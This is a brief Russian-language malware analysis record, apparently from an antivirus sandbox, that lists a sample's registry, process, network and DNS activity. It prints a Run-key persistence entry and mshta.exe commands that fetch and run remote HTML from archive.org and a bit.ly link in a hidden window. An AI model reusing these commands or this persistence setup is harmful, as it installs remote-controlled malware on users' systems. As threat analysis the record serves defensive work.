Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'LifeScience' = 'mshta https://ia601500.us.archive.org/11/items/10_20210628_202106/8.html'
- '<SYSTEM32>\mshta.exe' http:\\bit.ly/main68283y8y19
- 'bi#.ly':80
- 'ia#####9.us.archive.org':443
- 'cr#.#odaddy.com':80
- http://cr#.#odaddy.com/gdroot-g2.crl
- 'ia#####9.us.archive.org':443
- DNS ASK bi#.ly
- DNS ASK ia#####9.us.archive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK st####.rapidssl.com
- '<SYSTEM32>\mshta.exe' http:\\bit.ly/main68283y8y19' (со скрытым окном)